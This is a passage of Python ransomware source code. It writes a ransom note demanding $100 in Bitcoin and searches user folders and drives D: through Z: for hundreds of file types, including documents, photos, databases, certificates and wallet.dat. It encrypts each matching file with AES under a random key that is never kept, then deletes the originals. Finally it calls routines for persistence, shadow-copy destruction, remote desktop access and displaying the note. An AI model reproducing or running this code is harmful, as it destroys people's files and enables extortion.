 71 |         files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
 72 |     except:
 73 |         pass
 74 | 
 75 | 
 76 | def delete_file(filename):
 77 |     try:
 78 |         os.remove(filename)
 79 |     except:
 80 |         pass
 81 | 
 82 | 
 83 | def find_files(root_dir):
 84 |     write_instruction(root_dir, 'md')
 85 |     extentions = ['*.txt',
 86 |      '*.exe',
 87 |      '*.php',
 88 |      '*.pl',
 89 |      '*.7z',
 90 |      '*.rar',
 91 |      '*.m4a',
 92 |      '*.wma',
 93 |      '*.avi',
 94 |      '*.wmv',
 95 |      '*.csv',
 96 |      '*.d3dbsp',
 97 |      '*.sc2save',
 98 |      '*.sie',
 99 |      '*.sum',
100 |      '*.ibank',
101 |      '*.t13',
102 |      '*.t12',
103 |      '*.qdf',
104 |      '*.gdb',
105 |      '*.tax',
106 |      '*.pkpass',
107 |      '*.bc6',
108 |      '*.bc7',
109 |      '*.bkp',
110 |      '*.qic',
111 |      '*.bkf',
112 |      '*.sidn',
113 |      '*.sidd',
114 |      '*.mddata',
115 |      '*.itl',
116 |      '*.itdb',
117 |      '*.icxs',
118 |      '*.hvpl',
119 |      '*.hplg',
120 |      '*.hkdb',
121 |      '*.mdbackup',
122 |      '*.syncdb',
123 |      '*.gho',
124 |      '*.cas',
125 |      '*.svg',
126 |      '*.map',
127 |      '*.wmo',
128 |      '*.itm',
129 |      '*.sb',
130 |      '*.fos',
131 |      '*.mcgame',
132 |      '*.vdf',
133 |      '*.ztmp',
134 |      '*.sis',
135 |      '*.sid',
136 |      '*.ncf',
137 |      '*.menu',
138 |      '*.layout',
139 |      '*.dmp',
140 |      '*.blob',
141 |      '*.esm',
142 |      '*.001',
143 |      '*.vtf',
144 |      '*.dazip',
145 |      '*.fpk',
146 |      '*.mlx',
147 |      '*.kf',
148 |      '*.iwd',
149 |      '*.vpk',
150 |      '*.tor',
151 |      '*.psk',
152 |      '*.rim',
153 |      '*.w3x',
154 |      '*.fsh',
155 |      '*.ntl',
156 |      '*.arch00',
157 |      '*.lvl',
158 |      '*.snx',
159 |      '*.cfr',
160 |      '*.ff',
161 |      '*.vpp_pc',
162 |      '*.lrf',
163 |      '*.m2',
164 |      '*.mcmeta',
165 |      '*.vfs0',
166 |      '*.mpqge',
167 |      '*.kdb',
168 |      '*.db0',
169 |      '*.mp3',
170 |      '*.upx',
171 |      '*.rofl',
172 |      '*.hkx',
173 |      '*.bar',
174 |      '*.upk',
175 |      '*.das',
176 |      '*.iwi',
177 |      '*.litemod',
178 |      '*.asset',
179 |      '*.forge',
180 |      '*.ltx',
181 |      '*.bsa',
182 |      '*.apk',
183 |      '*.re4',
184 |      '*.sav',
185 |      '*.lbf',
186 |      '*.slm',
187 |      '*.bik',
188 |      '*.epk',
189 |      '*.rgss3a',
190 |      '*.pak',
191 |      '*.big',
192 |      '*.unity3d',
193 |      '*.wotreplay',
194 |      '*.xxx',
195 |      '*.desc',
196 |      '*.py',
197 |      '*.m3u',
198 |      '*.flv',
199 |      '*.js',
200 |      '*.css',
201 |      '*.rb',
202 |      '*.png',
203 |      '*.jpeg',
204 |      '*.p7c',
205 |      '*.p7b',
206 |      '*.p12',
207 |      '*.pfx',
208 |      '*.pem',
209 |      '*.crt',
210 |      '*.cer',
211 |      '*.der',
212 |      '*.x3f',
213 |      '*.srw',
214 |      '*.pef',
215 |      '*.ptx',
216 |      '*.r3d',
217 |      '*.rw2',
218 |      '*.rwl',
219 |      '*.raw',
220 |      '*.raf',
221 |      '*.orf',
222 |      '*.nrw',
223 |      '*.mrwref',
224 |      '*.mef',
225 |      '*.erf',
226 |      '*.kdc',
227 |      '*.dcr',
228 |      '*.cr2',
229 |      '*.crw',
230 |      '*.bay',
231 |      '*.sr2',
232 |      '*.srf',
233 |      '*.arw',
234 |      '*.3fr',
235 |      '*.dng',
236 |      '*.jpeg',
237 |      '*.jpg',
238 |      '*.cdr',
239 |      '*.indd',
240 |      '*.ai',
241 |      '*.eps',
242 |      '*.pdf',
243 |      '*.pdd',
244 |      '*.psd',
245 |      '*.dbfv',
246 |      '*.mdf',
247 |      '*.wb2',
248 |      '*.rtf',
249 |      '*.wpd',
250 |      '*.dxg',
251 |      '*.xf',
252 |      '*.dwg',
253 |      '*.pst',
254 |      '*.accdb',
255 |      '*.mdb',
256 |      '*.pptm',
257 |      '*.pptx',
258 |      '*.ppt',
259 |      '*.xlk',
260 |      '*.xlsb',
261 |      '*.xlsm',
262 |      '*.xlsx',
263 |      '*.xls',
264 |      '*.wps',
265 |      '*.docm',
266 |      '*.docx',
267 |      '*.doc',
268 |      '*.odb',
269 |      '*.odc',
270 |      '*.odm',
271 |      '*.odp',
272 |      '*.ods',
273 |      '*.odt',
274 |      '*.sql',
275 |      '*.zip',
276 |      '*.tar',
277 |      '*.tar.gz',
278 |      '*.tgz',
279 |      '*.biz',
280 |      '*.ocx',
281 |      '*.html',
282 |      '*.htm',
283 |      '*.3gp',
284 |      '*.srt',
285 |      '*.cpp',
286 |      '*.mid',
287 |      '*.mkv',
288 |      '*.mov',
289 |      '*.asf',
290 |      '*.mpeg',
291 |      '*.vob',
292 |      '*.mpg',
293 |      '*.fla',
294 |      '*.swf',
295 |      '*.wav',
296 |      '*.qcow2',
297 |      '*.vdi',
298 |      '*.vmdk',
299 |      '*.vmx',
300 |      '*.gpg',
301 |      '*.aes',
302 |      '*.ARC',
303 |      '*.PAQ',
304 |      '*.tar.bz2',
305 |      '*.tbk',
306 |      '*.bak',
307 |      '*.djv',
308 |      '*.djvu',
309 |      '*.bmp',
310 |      '*.cgm',
311 |      '*.tif',
312 |      '*.tiff',
313 |      '*.NEF',
314 |      '*.cmd',
315 |      '*.class',
316 |      '*.jar',
317 |      '*.java',
318 |      '*.asp',
319 |      '*.brd',
320 |      '*.sch',
321 |      '*.dch',
322 |      '*.dip',
323 |      '*.vbs',
324 |      '*.asm',
325 |      '*.pas',
326 |      '*.ldf',
327 |      '*.ibd',
328 |      '*.MYI',
329 |      '*.MYD',
330 |      '*.frm',
331 |      '*.dbf',
332 |      '*.SQLITEDB',
333 |      '*.SQLITE3',
334 |      '*.asc',
335 |      '*.lay6',
336 |      '*.lay',
337 |      '*.ms11 (Security copy)',
338 |      '*.sldm',
339 |      '*.sldx',
340 |      '*.ppsm',
341 |      '*.ppsx',
342 |      '*.ppam',
343 |      '*.docb',
344 |      '*.mml',
345 |      '*.sxm',
346 |      '*.otg',
347 |      '*.slk',
348 |      '*.xlw',
349 |      '*.xlt',
350 |      '*.xlm',
351 |      '*.xlc',
352 |      '*.dif',
353 |      '*.stc',
354 |      '*.sxc',
355 |      '*.ots',
356 |      '*.ods',
357 |      '*.hwp',
358 |      '*.dotm',
359 |      '*.dotx',
360 |      '*.docm',
361 |      '*.DOT',
362 |      '*.max',
363 |      '*.xml',
364 |      '*.uot',
365 |      '*.stw',
366 |      '*.sxw',
367 |      '*.ott',
368 |      '*.csr',
369 |      '*.key',
370 |      'wallet.dat']
371 |     for dirpath, dirs, files in os.walk(root_dir):
372 |         if 'Windows' not in dirpath:
373 |             for basename in files:
374 |                 for ext in extentions:
375 |                     if fnmatch.fnmatch(basename, ext):
376 |                         filename = os.path.join(dirpath, basename)
377 |                         yield filename
378 | 
379 | 
380 | def make_directory(file_path):
381 |     directory = file_path + '' + encfolder
382 |     if not os.path.exists(directory):
383 |         try:
384 |             os.makedirs(directory)
385 |         except:
386 |             pass
387 | 
388 | 
389 | def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
390 |     return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
391 | 
392 | 
393 | def generate_file(file_path, filename):
394 |     make_directory(file_path)
395 |     key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
396 |     newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
397 |     try:
398 |         encrypt_file(key, filename, newfilename)
399 |     except:
400 |         pass
401 | 
402 | 
403 | def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
404 |     if not out_filename:
405 |         out_filename = newfilename
406 |     iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
407 |     encryptor = AES.new(key, AES.MODE_CBC, iv)
408 |     filesize = os.path.getsize(in_filename)
409 |     with open(in_filename, 'rb') as infile:
410 |         with open(out_filename, 'wb') as outfile:
411 |             outfile.write(struct.pack('<Q', filesize))
412 |             outfile.write(iv)
413 |             while True:
414 |                 chunk = infile.read(chunksize)
415 |                 if len(chunk) == 0:
416 |                     break
417 |                 elif len(chunk) % 16 != 0:
418 |                     chunk += ' ' * (16 - len(chunk) % 16)
419 |                 outfile.write(encryptor.encrypt(chunk))
420 | 
421 | 
422 | listdir = (userhome + '\\Contacts\\',
423 |  userhome + '\\Documents\\',
424 |  userhome + '\\Downloads\\',
425 |  userhome + '\\Favorites\\',
426 |  userhome + '\\Links\\',
427 |  userhome + '\\My Documents\\',
428 |  userhome + '\\My Music\\',
429 |  userhome + '\\My Pictures\\',
430 |  userhome + '\\My Videos\\',
431 |  'D:\\',
432 |  'E:\\',
433 |  'F:\\',
434 |  'G:\\',
435 |  'I:\\',
436 |  'J:\\',
437 |  'K:\\',
438 |  'L:\\',
439 |  'M:\\',
440 |  'N:\\',
441 |  'O:\\',
442 |  'P:\\',
443 |  'Q:\\',
444 |  'R:\\',
445 |  'S:\\',
446 |  'T:\\',
447 |  'U:\\',
448 |  'V:\\',
449 |  'W:\\',
450 |  'X:\\',
451 |  'Y:\\',
452 |  'Z:\\')
453 | for dir_ in listdir:
454 |     for filename in find_files(dir_):
455 |         generate_file(dir_, filename)
456 |         delete_file(filename)
457 | 
458 | persistance()
459 | destroy_shadow_copy()
460 | create_remote_desktop()
461 | write_instruction(userhome + '\\Desktop\\', 'txt')
462 | os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
463 | setWallpaper(wallpaper_link)
464 | 


--------------------------------------------------------------------------------